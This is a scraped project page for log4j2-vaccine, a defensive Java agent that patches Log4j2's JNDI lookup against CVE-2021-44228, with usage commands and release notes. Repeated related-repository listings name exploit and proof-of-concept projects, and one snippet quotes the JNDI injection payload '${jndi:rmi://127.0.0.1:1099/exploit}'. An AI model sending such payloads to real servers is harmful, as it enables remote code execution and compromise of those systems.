log4j2-vaccine

Last update: Dec 2, 2022

Related tags

Overview

Log4j2-Vaccine

一款用于log4j2漏洞的疫苗，基于Instrumentation机制进行RASP防护，Patch了 org.apache.logging.log4j.core.net.JndiManager的lookup方法，部分代码借用了arthas的实现

Usage1: Java进程已经启动

启动Loader

java -jar loader.jar --agent agent.jar

选择需要Patch的进程(输入序号即可)

[INFO] Found existing java process, please choose one and hit RETURN.
* [1]: 50508 log4j2vuln3-0.0.1-SNAPSHOT.jar

Patch成功

如果Java进程较多，可在启动时添加all参数，Patch所有存活的Java进程

java -jar loader.jar --agent agent.jar all

Usage2: Java进程仍未启动

使用javaagent参数加载agent.jar

java -javaagent:agent.jar -jar web.jar

Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

Log4j2Scan This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use o

Jan 6, 2023

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch. It also supports nested JAR file scan

Dec 29, 2022

A log4j2 plugin to Eclipse.

Ganymede A log4j2 log viewer plugin for Eclipse. Installation Use the Eclipse update site: Ganymede2 - https://dbusche.github.io/Ganymede2/ History Th

Dec 15, 2022

log4j2 remote code execution or IP leakage exploit (with examples)

log4j2-exploits 2021-12-11.12-17-44.mp4 This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes

Sep 7, 2022

Non intrusive log4j2 RCE vulnerability patch.

Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w

Dec 2, 2022

log4j2 rce、poc

Apache Log4j 2 Apache log4j2 开源日志组件远程代码执行攻击者通过构造恶意请求，触发服务器log4j 2 日志组件的远程代码执行漏洞。漏洞无需特殊配置，经验证，最新版的补丁可以防护此问题官方最新补丁： log4j-2.15.0-rc2 紧急处置方案 2.10 or 以上

Dec 4, 2022

Comments

maybe, just return "mock str."

https://github.com/chaitin/log4j2-vaccine/blob/ea7491cd64fd0c7ec5b0ee45fd84e85880c75f3b/agent/src/main/java/com/chaitin/vaccine/agent/transform/JndiManagerTransformer.java#L48

opened by pengpj 2

Releases(log4j2-vaccine-v0.3)

log4j2-vaccine-v0.3(Dec 11, 2021)
支持Patch所有存活的Java进程

增加漏洞演示以及测试环境 (log4j2vuln3-0.0.2-SNAPSHOT.zip)

Source code(tar.gz)
Source code(zip)
log4j2-vaccine-v0.3.zip(888.54 KB)
log4j2vuln3-0.0.2-SNAPSHOT.zip(15.64 MB)
log4j2-vaccine-v0.2(Dec 11, 2021)
lookup方法直接返回null避免非rmi和ldap协议的攻击向量

Source code(tar.gz)
Source code(zip)
log4j2-vaccine-v0.2.zip(888.00 KB)
log4j2-vaccine-v0.1(Dec 10, 2021)

log4j2-vaccine-v0.1
Source code(tar.gz)
Source code(zip)
log4j2-vaccine-v0.1.zip(887.89 KB)

Owner

Chaitin Tech

长亭科技

GitHub

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

2 Dec 21, 2021

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Log4j 2 CVE-2021-44228 测试样本应用基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) 可用接口接口请求方法参数 vulnerable_request_get GET v=payload vulnerable_reque

3 Mar 23, 2022

Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

Log4j2Scan This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use o

439 Jan 6, 2023

A log4j2 plugin to Eclipse.

Ganymede A log4j2 log viewer plugin for Eclipse. Installation Use the Eclipse update site: Ganymede2 - https://dbusche.github.io/Ganymede2/ History Th

3 Dec 15, 2022

Non intrusive log4j2 RCE vulnerability patch.

Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w

67 Dec 2, 2022

log4j2 rce、poc

86 Dec 4, 2022

Java software that notifies by voice when a new Vaccine is available in your specified district/pincode

CowinVaccineAvailabilitySpeaker is a Java software that notifies user by voice when a new vaccine is available in the specified pin-code/district. It

10 May 24, 2021

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo 利用 CVE-2021-44228，通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex

2 Dec 14, 2021

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

2 Dec 21, 2021

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Log4j 2 CVE-2021-44228 测试样本应用基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1) 可用接口接口请求方法参数 vulnerable_request_get GET v=payload vulnerable_reque

3 Mar 23, 2022

log4j2-vaccine

Related tags

Overview

Log4j2-Vaccine

Usage1: Java进程已经启动

Usage2: Java进程仍未启动

You might also like...

Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

A log4j2 plugin to Eclipse.

log4j2 remote code execution or IP leakage exploit (with examples)

Non intrusive log4j2 RCE vulnerability patch.

log4j2 rce、poc

Comments

maybe, just return "mock str."

Releases(log4j2-vaccine-v0.3)

log4j2-vaccine-v0.3(Dec 11, 2021)

log4j2-vaccine-v0.2(Dec 11, 2021)

log4j2-vaccine-v0.1(Dec 10, 2021)

Owner

Chaitin Tech

log4j2 Log4Shell CVE-2021-44228 proof of concept

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

A log4j2 plugin to Eclipse.

Non intrusive log4j2 RCE vulnerability patch.

log4j2 rce、poc

Java software that notifies by voice when a new Vaccine is available in your specified district/pincode

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

log4j2 Log4Shell CVE-2021-44228 proof of concept

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)